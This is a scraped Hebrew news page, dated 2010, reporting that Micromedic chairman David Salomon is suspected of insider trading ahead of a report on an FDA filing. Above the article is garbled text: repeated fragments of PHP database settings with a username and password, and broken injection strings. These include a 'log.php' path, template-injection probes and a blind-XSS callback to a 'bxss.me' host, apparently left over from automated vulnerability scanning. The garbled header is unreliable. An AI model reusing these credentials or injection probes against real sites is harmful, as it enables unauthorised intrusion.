$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> דוד סלומון יו"ר מיקרומדיק חשוד כי רכש מניות תוך ניצול מידע פנים
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

דוד סלומון יו"ר מיקרומדיק חשוד בשימוש במידע פנים

תאריך: 23/08/2010 17:47   מחבר: מערכת האתר

דוד סלומון מכהן כיו"ר דירקטוריון חברת מיקרומדיק ובעל מניות עיקרי (17%) . החברה מתמקדת בהשקעות באמצעות חברות מוחזקות בתחום הדיאגנוסטיקה והטיפול במחלות , תוך כדי פיתוח המבוסס על מיפוי הגנום האנושי.

בשנת 2007 הגישה מיקרומדיק בקשה לרשות לניירות ערך לאשר תשקיף לגיוס הון מהציבור. למיקרומדיק מספר חברות בנות וקשורות. אחת מהן היא חברת Met המוחזקת על ידה בשיעור 20% החל מחודש יוני 2005.

חברת Met עוסקת בפיתוח מוצרים לטיפול מיקרו כירורגי בכלי דם באמצעות מכשיר פרי פיתוחה שנקרא Microcan .

לפי הפרסום באתר ביזפורטל, ביום 12.02.07 פירסמה מיקרומדיק דוח מיידי ובו נכתב כי חברת Met החלה בייצור מכשיר Microcan המיועד לטיפול קוסמטי בהעלמת כלי דם זעירים מהפנים והרגליים. עוד נמסר כי חברה זו הגישה בקשה למינהל התרופות והמזון בארה"ב FDA לאישור המכשיר ושיווקו.

כשבועיים לפני הדוח המיידי של מיקרומדיק עלו שערי מניותיה בשיעור מצטבר של כ – 74% תוך גידול ניכר בנפחי המסחר. העלייה בשער המניה נתפס כחריג הואיל והמניה ידעה קודם תנודתיות מרובה.

תוך כדי חקירת הרשות לניירות ערך התברר ככל הנראה, כי דוד סלומון ידע והעריך כי פרסום הדוח המיידי בדבר האישור הצפוי של ה FDA עבור המכשיר הקוסמטי של חברת Met יזניק את שער המנייה ולכן הקדים לרכוש מניות מיקרומדיק בשווי של 1.1 מליון שקלים. בעשותו כן עשה סלומון שימוש לכאורה במידע פנים בניגוד מפורש להוראות החוק.

המדובר בעבירה חמורה על חוק ניירות ערך שהעונש בצידה הוא חמש שנות מאסר.
 

תגיות בעמוד:   מידע פנים    ניירות ערך    סלומון    מיקרומדיק    דיווח מידי    בורסה